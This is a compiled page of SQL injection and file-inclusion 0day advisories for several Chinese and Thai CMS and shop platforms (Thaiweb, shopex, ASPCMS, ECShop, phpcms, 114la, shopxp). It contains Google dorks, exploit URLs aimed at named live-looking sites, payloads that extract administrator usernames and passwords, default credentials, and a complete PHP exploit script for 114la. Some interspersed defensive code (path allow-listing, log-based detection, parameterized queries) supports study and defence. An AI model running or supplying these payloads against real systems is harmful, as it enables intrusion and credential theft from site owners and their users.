Below are the Thaiweb remote file inclusion / SQL injection 0day vulnerability advisories collected by the site editor (10 posts in total). We hope they are useful to readers who need them, and that, like this post's contributor "想自闭辽", you will actively submit good articles to this site.
Google dorks:
intext:powered by Thaiweb
inurl:index.php?page=board.php
Exploit point 1 (file inclusion): www.xfack.com/index.php?page=../../../../../../../../../../../../../etc/passwd
Exploit point 2 (SQL injection): www.xfack.com/index.php?page=boardque.php&bod_id=4'
www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
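Both exploit points above come from an unvalidated `page` parameter that is handed to an include. As an added defender-side example (not code from the Thaiweb post or from Thaiweb itself), the Python below shows the two checks such a dispatcher needs: an allow-list of page names, and a realpath containment test as defence in depth. The web root path and the allow-list entries are assumptions; the page names are taken from the dorks above.

```python
import os
from typing import Optional

# Constructed example: a resolver for an "index.php?page=..." style dispatcher.
# ALLOWED_PAGES holds the page names seen in the dorks; the web root is assumed.
ALLOWED_PAGES = frozenset({"board.php", "boardque.php"})


def is_contained(base_dir: str, candidate: str) -> bool:
    """True only if candidate, after resolving '..' and symlinks, stays under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    try:
        # commonpath compares path components, so "/srv/www/site2" is not
        # mistaken for a child of "/srv/www/site" the way a string prefix test would
        return os.path.commonpath([base, target]) == base
    except ValueError:  # different drives on Windows
        return False


def resolve_page(base_dir: str, page: str) -> Optional[str]:
    """Map a user-supplied page parameter to a file under base_dir, or None.

    Gate 1: the allow-list, so '../' sequences, absolute paths and unexpected
    files never reach the include at all.
    Gate 2: realpath containment, kept even though gate 1 already refuses
    traversal, in case the allow-list is later relaxed to a pattern.
    """
    if page not in ALLOWED_PAGES:
        return None
    candidate = os.path.join(base_dir, page)
    if not is_contained(base_dir, candidate):
        return None
    return os.path.realpath(candidate)


if __name__ == "__main__":
    base = "/srv/www/thaiweb"  # hypothetical web root
    for p in ("board.php", "../../../../etc/passwd", "/etc/passwd", "boardque.php/../x.php"):
        print(f"{p!r:40} -> {resolve_page(base, p)}")
```

The allow-list is the control that actually closes the hole; the containment check exists so that a later "accept any `*.php` under the root" change does not silently reopen it.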
6CMS SQL 0day vulnerability advisory
Google (g.cn) keyword: 6CMS企业望站管理系统(中英繁三语版)
Default account/password: admin
Backend: admin/
I have no idea what the programmer was doing: I saw an anti-injection sql.asp in the admin directory,
but the parent directory has nothing of the sort.
Default database: data/#sze7xiaohu.mdb
The session check also feels haphazard. I recall a file under the admin directory for posting job positions that can be accessed directly (I don't remember which file exactly); it seems you can post messages straight through it.
Just feed it straight into 啊D; the backend also offers direct database backup.
It doesn't feel like it has much exploitation value. Boring; keep it as something to research on your own.
Yet another SQL injection
Tested version: shopex-singel-4.8.5.78660
File: \core\shop\controller\ctl.tools.php
function products() {
    $objGoods = &$this->system->loadModel('goods/products');
    $filter = array();
    foreach (explode(',', $_POST['goods']) as $gid) {
        $filter['goods_id'][] = $gid;
    }
    // $_POST['goods'] is concatenated straight into the find_in_set() column expression
    $this->pagedata['products'] = $objGoods->getList(
        $objGoods->defaultCols . ',find_in_set(goods_id,"' . $_POST['goods'] . '") as rank',
        $filter, 0, -1, array('rank', 'asc'));
}
By inspection, $_POST['goods'] goes straight into the SQL statement. Because some of the files are encrypted, I enabled SQL statement execution logging instead.
Submit:
goods=aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23
Query log:
130526 20:03:23 352 Connect root@localhost on
352 Init DB shopex
352 Query SET NAMES 'utf8'
352 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc
352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#") as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615
Looking at the log, the variable has indeed made it into the SQL statement.
shopex ctl.member.php file SQL injection vulnerability advisory
Yet another SQL injection vulnerability. Tested version: shopex-singel-4.8.5.78660
File: \core\shop\controller\ctl.member.php
function delTrackMsg() {
    if (!empty($_POST['deltrack'])) {
        $oMsg = &$this->system->loadModel('resources/msgbox');
        // $_POST['deltrack'] is handed to the model without any validation
        $oMsg->delTrackMsg($_POST['deltrack']);
        $this->splash('success', $this->system->mkUrl("member", "track"), __('删除成功'));
    } else {
        $this->splash('failed', $this->system->mkUrl("member", "track"), __('删除失败: 没有选中任何记录!'));
    }
}
Follow $oMsg->delTrackMsg($_POST['deltrack']);
into the file \core\model_v5\resources\mdl.msgbox.php:
public function delTrackMsg($aMsgId) {
    foreach ($aMsgId as $val) {
        if ($val) {
            $aTmp[] = $val;
        }
    }
    if ($aTmp) {
        // the ids are joined into the IN (...) list without escaping or casting
        $this->db->exec("DELETE FROM sdb_message WHERE msg_id IN (" . implode(",", $aTmp) . ") AND del_status='1'");
        $this->db->exec("UPDATE sdb_message SET del_status='2' WHERE msg_id IN (" . implode(",", $aTmp) . ")");
    }
    return true;
}
SQL injection that lands in a DELETE statement is pure grunt work: use whether or not the message got deleted as the oracle and work through it slowly.
Submitted request body: deltrack[1]=1) and (select count(*) from sdb_operators)=1%23
SQL execution log:
130526 20:31:25 360 Connect root@localhost on
360 Init DB shopex
360 Query SET NAMES 'utf8'
360 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
360 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
360 Query select member_id,member_lv_id,email,uname,b_year,b_month,b_day,password,unreadmsg,cur,lang,point,experience from sdb_members where member_id=4 LIMIT 0, 1
360 Query SELECT count(*) AS unreadmsg FROM sdb_message WHERE to_type = 0 AND del_status != '1' AND folder = 'inbox' AND unread = '0' AND to_id =4 LIMIT 0, 1
360 Query SELECT plugin_name,plugin_ident FROM sdb_plugins WHERE 1 AND sdb_plugins.disabled = 'false' AND sdb_plugins.plugin_type='app' LIMIT 0, 20
360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='commodity_radar' LIMIT 0, 1
360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='shopex_stat' LIMIT 0, 1
360 Query SELECT plugin_id,plugin_path,plugin_struct,plugin_config,plugin_base FROM sdb_plugins WHERE plugin_type='app' AND plugin_ident='pay_offline' LIMIT 0, 1
360 Query DELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
Executed successfully.
Proof of vulnerability:
Because (select count(*) from sdb_operators)=1 holds, the record with msg_id=1 was deleted;
guess it out bit by bit...
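Both shopex write-ups use the MySQL general query log to confirm that the parameter reached the statement; the same log is a usable detection source for the defender. The Python below is an added example, not code from the posts or from shopex: it parses general-log lines in the format shown above and flags Query entries that carry the indicator shapes appearing on this page (UNION SELECT, information_schema, the floor(rand(0)*2) GROUP BY duplicate-key trick from the ECShop and 114la posts further down, an Access iif(), and a ") AND (SELECT" predicate as in the DELETE statement). The sample log lines are constructed in that format, and the list of sensitive tables is an assumption.

```python
import re
from dataclasses import dataclass, field

# One general-log line: optional "YYMMDD HH:MM:SS" stamp, connection id,
# command ("Connect", "Init DB", "Query", "Quit"), then the argument.
LOG_LINE = re.compile(
    r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2}\s+)?\s*(\d+)\s+(Connect|Init DB|Query|Quit)\s*(.*)$"
)

# Indicator regexes modelled on the payload shapes in the write-ups on this page.
STRONG = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "error_based_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "predicate_subselect": re.compile(r"\)\s*(?:and|or)\s*\(\s*select\b", re.I),
    "access_iif": re.compile(r"\biif\s*\(", re.I),
}
# Weak on its own ('#' is legal inside string literals); reported only as context.
COMMENT_TERMINATOR = re.compile(r"#|--\s|/\*")
# Tables whose appearance in a front-end query deserves attention (assumed names,
# taken from the advisories on this page).
SENSITIVE_TABLES = ("sdb_operators", "ecs_admin_user", "ylmf_admin_user", "AspCms_User")


@dataclass
class Finding:
    conn_id: int
    indicators: list = field(default_factory=list)
    query: str = ""


def parse_general_log(lines):
    """Yield (conn_id, command, argument) for every line that parses."""
    for line in lines:
        m = LOG_LINE.match(line.rstrip("\n"))
        if m:
            yield int(m.group(1)), m.group(2), m.group(3)


def scan_general_log(lines, sensitive_tables=SENSITIVE_TABLES):
    """Return a Finding for every Query line carrying at least one strong indicator."""
    findings = []
    for conn_id, cmd, arg in parse_general_log(lines):
        if cmd != "Query":
            continue
        hits = [name for name, rx in STRONG.items() if rx.search(arg)]
        hits += [f"sensitive_table:{t}" for t in sensitive_tables
                 if re.search(rf"\b{re.escape(t)}\b", arg, re.I)]
        if not hits:
            continue  # a comment terminator alone never raises a finding
        if COMMENT_TERMINATOR.search(arg):
            hits.append("comment_terminator")
        findings.append(Finding(conn_id, hits, arg))
    return findings


# Constructed sample, in the general-log layout quoted in the shopex posts.
SAMPLE_LOG = """\
130526 20:03:23\t  352 Connect\troot@localhost on
\t\t  352 Init DB\tshopex
\t\t  352 Query\tSET NAMES 'utf8'
\t\t  352 Query\tSELECT * FROM sdb_plugins WHERE plugin_type="app"
\t\t  352 Query\tSELECT bn,name,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3 from sdb_operators#") as rank FROM sdb_goods ORDER BY rank asc
130526 20:31:25\t  360 Connect\troot@localhost on
\t\t  360 Query\tDELETE FROM sdb_message WHERE msg_id IN (1) and (select count(*) from sdb_operators)=1#) AND del_status='1'
\t\t  361 Query\tSELECT 1 FROM (SELECT count(*),concat((SELECT user_name FROM ecs_admin_user LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a
\t\t  362 Query\tINSERT INTO sdb_message (msg_id,content) VALUES (7,'ticket #42 follow-up')
""".splitlines()


if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"conn {f.conn_id}: {', '.join(f.indicators)}\n    {f.query[:90]}")
```

Running it on the sample prints three findings (connections 352, 360 and 361) and stays silent on the INSERT whose only "indicator" is a `#` inside a string literal, which is the reason the comment terminator is treated as context rather than as a trigger.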
Author: code_sec
ASPCMS filters user-supplied parameters insufficiently, so an attacker can submit SQL statements to query the database and obtain sensitive information.
The vulnerability lives in /admin_aspcms/_content/_Content/AspCms_ContentFun.asp. This file does not verify administrator privileges, so anyone can access it, and it does not pass the parameters it reads through the custom filterPara function, which leads to injection in several places. The code is as follows:
<% ''die debugmode
dim action : action=getForm("action","get")
dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Content, ContentStatus, IsTop, IsRecommend, IsImageNews, IsHeadline, IsFeatured, ContentOrder, IsGenerated, Visits, AddTime, ImagePath, IndexImage, DownURL, PageTitle, PageKeywords, PageDesc, PageFileName, spec, EditTime,DownGroupID,IsNoComment,Star,Timeing,TimeStatus,VideoGroupID,CHvalue,SpecCategory
''SpecCategory identifies which type the custom parameters belong to
dim sortType, keyword, page, psize, order, ordsc, sortTypeName
''every parameter below is read with getForm only; none of them goes through filterPara
sortType=getForm("sortType","get")
if isnul(sortType) then sortType=0
sortid=getForm("sortid","post")
if isnul(sortid) then sortid=getForm("sortid","get")
keyword=getForm("keyword","post")
if isnul(keyword) then keyword=getForm("keyword","get")
page=getForm("page","get")
psize=getForm("psize","get")
order=getForm("order","get")
ordsc=getForm("ordsc","get")
DownGroupID=getForm("DownGroupID","post")
VideoGroupID=getForm("VideoGroupID","post")
select case sortType
    case "2"
        sortTypeName ="文章"
        SpecCategory = "C"
    case "3"
        sortTypeName ="产品"
        SpecCategory = "P"
    case "4"
        sortTypeName ="下载"
        SpecCategory = "DL"
    case "5"
        sortTypeName ="招聘"
        SpecCategory = "HR"
    case "6"
        sortTypeName ="相册"
        SpecCategory = "FO"
    case "8"
        sortTypeName = "视频"
        SpecCategory = "VI"
end select
''single page 1, article 2, product 3, download 4, recruitment 5, album 6, link 7, video 8
Select case action
    case "add" : addContent
    case "edit" : editContent
    case "move" : moveContent
    case "copy" : copyContent
    case "rpost" : rpostContent
    case "del" : delContent
    case "recovery" : Recovery
    case "tdel" : trueDelContent
    case "on" : onOff "on", "Content", "ContentID", "ContentStatus", "", getPageName&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
    case "off" : onOff "off", "Content", "ContentID", "ContentStatus", "", getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
    case "order" : UpdateOrder
End Select
Sub trueDelContent
    dim id : id=getForm("id","both")
    if isnul(id) then alertMsgAndGo "请选择要操作的内容","-1"
    if runmode=1 then
        dim rs, sql, filepath
        dim templateobj : set templateobj=new TemplateClass
        ''id is concatenated into the IN (...) clause exactly as received
        sql="select ContentID,Title,sortType,SortFolder,a.GroupID,ContentFolder,ContentFileName,a.AddTime,a.PageFileName,a.SortID,b.GroupID from {prefix}Content as a, {prefix}Sort as b where a.LanguageID="&session("languageID")&" and a.SortID=b.SortID and ContentStatus=2 and ContentID in("&id&")"
        set rs=conn.exec(sql,"r1")
        do while not rs.eof
            filepath=templateobj.getContentLink(rs("SortID"),rs("ContentID"),rs("SortFolder"),rs("a.GroupID"),rs("ContentFolder"), _
                rs("ContentFileName"),rs("AddTime"),rs("PageFileName"),rs("b.GroupID"))
            if isExistFile(filepath) then delFile filepath
            ''echo filepath&""
            rs.movenext
        loop
    end if
    ''the same unvalidated id reaches the DELETE statement whatever runmode is
    conn.exec "delete from {prefix}Content where ContentStatus=2 and ContentID in("&id&")","exe"
    alertMsgAndGo "彻底删除成功",getPageName()&"?sortType="&sortType&"&sortid="&sortid&"&keyword="&keyword&"&page="&page&"&psize="&psize&"&order="&order&"&ordsc="&ordsc
End Sub
%>
Exploitation is fairly simple: use iif to force an error:
www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=97),2,chr(97))
Checks whether the first character of the administrator's username is "a".
www.xxx.com/aspcms/admin_aspcms/_content/_Content/AspCms_ContentFun.asp?action=tdel&id=2=iif(((select asc(mid(LoginName,1,1)) from AspCms_User where UserID=1)=98),2,chr(97))
Checks whether the first character of the administrator's username is "b".
When the comparison is false, the error is forced.
Thanks to 欠杀's black box.
ECShop all-versions SQL injection 0day advisory
Add any product to the cart; on the page where you fill in the delivery address there is a region selector:
flow.php?step=consignee&direct_shopping=1
For example, choose Anhui as the province.
The POST data is as follows:
country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3
Change it to:
province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
PS: for the detailed method, use the Firefox Tamper Data plugin... to modify the POST content...
First register an account, put any product in the cart, then fill in the address, phone and so on; once everything is filled in, start capturing and modify the packet,
and the error page will be echoed back.
...
I have not used this to attack sites myself; I only tested one latest version and one old version, and both worked, so I wrote "all versions"; in theory it should be.
Release date: -01.23
Published by: eidelweiss
Affected version: phpcms v9 blind
Vendor: www.phpcms.cn
Vulnerability type: SQL injection
Vulnerability description: parameter filtering in phpcms v9 is susceptible to (blind) SQL injection.
google dork: inurl:"index.php?m=content+c=rss+catid=10"
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] host/index.php?m=content&c=rss&catid=10 <= True
[!] host/index.php?m=content&c=rss&catid=-10 <= False
[+] host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
<?php
$sbcopyright='
----------------------------------------
114la feedback injection Vul Exploit
By xZL
Team: www.0kee.com
2011.04.02
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' 127.0.0.1 /
----------------------------------------
';
if ($argc < 3) {
    print_r($sbcopyright);
    die;
}
ob_start();
$url = $argv[1];
$path= $argv[2];
$sock = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
$data = "username=0kee%E7%B8%97'&email=,0,(select%201%20from%20(select%20count(*),concat((SELECT%20concat(name,0x5f,password)%20FROM%20ylmf_admin_user limit 0,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2)#&content=~~~~~this is a test from 0kee security team~~~~~";
fwrite($sock, "POST $path/feedback/feedback.php HTTP/1.1\r\n");
fwrite($sock, "Accept: */*\r\n");
fwrite($sock, "Referer: $url/#M\r\n");
fwrite($sock, "Accept-Language: zh-cn\r\n");
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");
fwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
fwrite($sock, "User-Agent: Mozilla\r\n");
fwrite($sock, "Host: $url\r\n");
fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
fwrite($sock, "Connection: Keep-Alive\r\n");
fwrite($sock, "Cache-Control: no-cache\r\n");
fwrite($sock, "Cookie:ASPSESSIONIDASDRRBRA=MFILAMMAENMDGAPJLLKPEAON\r\n\r\n");
fwrite($sock, $data);
$headers = "";
while ($str = trim(fgets($sock, 4096)))
    $headers .= "$str\n";
echo "\n";
$body = "";
while (!feof($sock))
    $body .= fgets($sock, 4096);
fclose($sock);
if (strpos($body, 'Duplicate entry') !== false) {
    preg_match('/Duplicate entry \'(.*)1\'/', $body, $arr);
    $result=explode("_",$arr[1]);
    print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\nGood Luck!");
}else{
    print_r("Exploit Failed! \n");
}
ob_end_flush();
?>
shopxp pinglun.asp file SQL injection vulnerability analysis advisory
Vulnerability author: zpino
The vulnerability is in the /admin/pinglun.asp file:
<%=webname%>--用户评论
<%dim shopxpptid,action
pinglunid=request.QueryString("id")
action=request.QueryString("action")
if action="save" then
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shopxp_pinglun where pinglunid="&pinglunid,conn,1,3
rs("huifu")=HTMLEncode2(trim(request("huifu")))
rs("huifudate")=now()
rs.update
rs.close
set rs=nothing
... /* omitted */ ...
<%set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shopxp_pinglun where pinglunid="&pinglunid,conn,1,3
%>
First, look at the database connection include:
<%
dim conn,connstr,db
startime=timer()
db="../shopxp/"&dataname&"" 'database
on error resume next 'keep trying to connect to the database until timeout; this can also strengthen SQL injection filtering
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
'connstr="DBQ="+server.mappath(""&db&"")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
This file's job is to obtain the database connection object. Back in /admin/pinglun.asp:
pinglunid=request.QueryString("id")
action=request.QueryString("action")
The value of id is assigned to pinglunid. Following pinglunid, we reach:
<%set rs=server.CreateObject("adodb.recordset")
rs.open "select * from shopxp_pinglun where pinglunid="&pinglunid,conn,1,3
%>
As you can see, it is passed into the database without any filtering, and the query result is printed out further down, so a SQL injection vulnerability results.
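The shopex `goods` and `deltrack` parameters, the ASPCMS `id` and the shopxp `pinglunid` discussed above share one root cause: an id (or list of ids) is concatenated into the query text instead of being validated and bound. The Python below is an added example, not code from any of these projects, showing the hardened shape with sqlite3 placeholders: every id must be a plain decimal integer, the IN list gets one placeholder per id, and the lookup binds the id. The table layouts, the `to_id` ownership predicate and the demo rows are constructed assumptions.

```python
import re
import sqlite3
from typing import Iterable, Optional, Union

ID_RE = re.compile(r"\d{1,18}")


class BadInput(ValueError):
    """Raised for any id that is not a plain decimal integer."""


def parse_id_list(raw: Union[str, Iterable, dict]) -> list:
    """Normalise a comma-separated string (shopex 'goods'), a PHP-style array
    (deltrack[n]=...) or any iterable into a non-empty list of ints, rejecting
    everything else before it can reach a query."""
    if isinstance(raw, str):
        items = raw.split(",")
    elif isinstance(raw, dict):
        items = list(raw.values())
    else:
        items = list(raw)
    ids = []
    for item in items:
        text = str(item).strip()
        if not ID_RE.fullmatch(text):
            raise BadInput(f"rejected id value: {text!r}")
        ids.append(int(text))
    if not ids:
        raise BadInput("empty id list")
    return ids


def parse_id(raw) -> int:
    return parse_id_list([raw])[0]


def is_valid_id_list(raw) -> bool:
    try:
        parse_id_list(raw)
        return True
    except BadInput:
        return False


def delete_tracked_messages(conn, raw_ids, owner_id: int) -> int:
    """Hardened counterpart of delTrackMsg: validated ids, one placeholder per id,
    and an ownership predicate (to_id, assumed) so a member can only remove
    their own messages.  Returns the number of rows deleted."""
    ids = parse_id_list(raw_ids)
    marks = ",".join("?" * len(ids))  # only '?' characters enter the SQL text
    cur = conn.execute(
        f"DELETE FROM sdb_message WHERE msg_id IN ({marks}) AND del_status='1' AND to_id=?",
        (*ids, owner_id),
    )
    conn.commit()
    return cur.rowcount


def fetch_comment(conn, raw_id) -> Optional[tuple]:
    """Hardened counterpart of the pinglun.asp lookup: the id is validated and bound."""
    pid = parse_id(raw_id)
    return conn.execute(
        "SELECT pinglunid, huifu FROM shopxp_pinglun WHERE pinglunid=?", (pid,)
    ).fetchone()


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory schema using the column names quoted on this page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sdb_message (msg_id INTEGER PRIMARY KEY, to_id INTEGER, del_status TEXT)")
    conn.executemany("INSERT INTO sdb_message VALUES (?,?,?)",
                     [(1, 4, "1"), (2, 4, "1"), (3, 5, "1"), (4, 4, "0")])
    conn.execute("CREATE TABLE shopxp_pinglun (pinglunid INTEGER PRIMARY KEY, huifu TEXT)")
    conn.executemany("INSERT INTO shopxp_pinglun VALUES (?,?)", [(1, "first"), (2, "second")])
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    # member 4 asks to delete 1,2,3 but only owns 1 and 2 -> 2 rows deleted
    print(delete_tracked_messages(db, {1: "1", 2: "2", 3: "3"}, owner_id=4))
    # the payload shapes from the posts above never reach the database
    for bad in ({1: "1) and (select count(*) from sdb_operators)=1#"}, "2=iif(1,2,3)"):
        print(repr(bad), "valid:", is_valid_id_list(bad if isinstance(bad, dict) else [bad]))
```

The validation step is deliberately stricter than a cast: `int("1) and ...")` would already fail, but `int(" 7 ")` or `int("+7")` succeed silently, and a regex on the raw text keeps the accepted alphabet explicit. The ownership predicate is not on the page; it is the second control a reviewer would ask for, since even a perfectly bound id lets a member delete any message without it.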
ShopEx 4.85 latest version SQL injection: no login required, bypasses GPC, and can directly query the administrator password and echo it back.
Nothing more to say; straight to the exploit code. Save the HTML below as an .html file and change the localhost part to the site's real address: